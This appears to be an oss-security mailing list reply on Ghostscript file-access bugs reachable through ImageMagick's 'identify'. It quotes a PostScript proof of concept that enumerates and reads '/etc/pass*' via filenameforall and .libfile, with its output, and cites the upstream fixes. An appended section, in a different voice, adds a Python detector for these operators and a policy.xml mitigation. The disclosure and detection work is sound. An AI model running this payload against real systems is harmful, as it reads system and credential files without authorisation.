Date: Thu, 29 Sep 2016 08:25:54 +0200
From: Florian Weimer <fw@...eb.enyo.de>
To: oss-security@...ts.openwall.com
Subject: Re: ImageMagick identify "d:" hangs

* Tavis Ormandy:

> Here is the code I'm testing with (Note: I really don't know much
> postscript - and I hate it).
>
> $ cat test.ps
> /dumpname {
>     dup             % copy filename
>     dup             % copy filename
>     print           % print filename
>     (\n) print      % print newline
>     status          % stat filename
>     {
>         (stat succeeded\n) print
>         ( ctime:) print
>         64 string cvs print
>         ( atime:) print
>         64 string cvs print
>         ( size:) print
>         64 string cvs print
>         ( blocks:) print
>         64 string cvs print
>         (\n) print
>         (\n) print
>     }{
>         (unable to stat\n\n) print
>     } ifelse
>     .libfile        % open as library
>     {
>         (.libfile returned file\n\n) print
>         64 string readstring
>         pop         % discard result (should probably test)
>         print
>         (\n) print
>     }{
>         (.libfile returned string\n) print
>         print
>         (\n) print
>     } ifelse
> } def
>
> (/etc/pass*) /dumpname load 256 string filenameforall

filenameforall was fixed as part of this:

  http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=ab109aaeb3ddba59518b036fb288402a65cf7ce8
  http://bugs.ghostscript.com/show_bug.cgi?id=694724

This also covers getenv and has already been assigned CVE-2013-5653.

> $ identify test.ps
> /etc/passwd
> stat succeeded
>  ctime:1474998792 atime:1474998792 size:2662 blocks:8
>
> .libfile returned file

.libfile is not yet fixed upstream.  I reported this upstream:

  http://bugs.ghostscript.com/show_bug.cgi?id=697169
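As an added example (not code from this thread, from Ghostscript or from ImageMagick), a lexical scanner that reports the operators discussed above in PostScript input before it reaches `identify`; the sample input is a condensed, constructed version of the test.ps quoted above, and the operator list is this example's own starting set.

```python
# Added example, not from the thread, Ghostscript or ImageMagick: a lexical
# scanner that reports the file-access operators discussed above, with line
# numbers, while ignoring %-comments and (...) strings. Triage aid only: a name
# built at run time, e.g. (.libfile) cvn load exec, is not caught.
FILE_ACCESS_OPERATORS = {"filenameforall", "getenv", ".libfile", "status"}
DELIMITERS = set("()<>[]{}/%")

# Constructed input: a condensed form of the test.ps quoted in the thread.
SAMPLE_PS = r"""/dumpname {
    dup print (\n) print
    status                     % stat filename
    { (stat succeeded\n) print } { (unable to stat\n) print } ifelse
    .libfile                   % open as library
    { 64 string readstring pop print } { print } ifelse
} def
(/etc/pass*) /dumpname load 256 string filenameforall
"""


def scan_postscript(source: str) -> dict[str, list[int]]:
    """Return {operator: [line numbers]} for hits outside comments and strings."""
    hits: dict[str, list[int]] = {}
    i, n = 0, len(source)
    while i < n:
        ch = source[i]
        if ch == "%":                                   # comment runs to end of line
            i = (source.find("\n", i) + 1) or n         # -1 (no newline) becomes n
        elif ch == "(":                                 # string: nested parens, \ escapes
            depth = 0
            while i < n and (depth or source[i] == "("):
                if source[i] == "\\":
                    i += 1                              # skip the escaped character
                else:
                    depth += {"(": 1, ")": -1}.get(source[i], 0)
                i += 1
        elif ch.isspace() or ch in ")<>[]{}":            # delimiters carry no name
            i += 1
        else:
            if ch == "/":                               # literal name, e.g. /.libfile load
                i += 1
            start = i
            while i < n and not source[i].isspace() and source[i] not in DELIMITERS:
                i += 1
            token = source[start:i]
            if token in FILE_ACCESS_OPERATORS:
                hits.setdefault(token, []).append(source.count("\n", 0, start) + 1)
    return hits
```

`scan_postscript(SAMPLE_PS)` reports `status` on line 3, `.libfile` on line 5 and `filenameforall` on line 8, while the same names inside strings or comments are ignored. The durable fix is the upstream Ghostscript change; where PostScript input is not needed at all, ImageMagick's policy.xml can deny the PS coder so `identify` never hands such files to Ghostscript.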
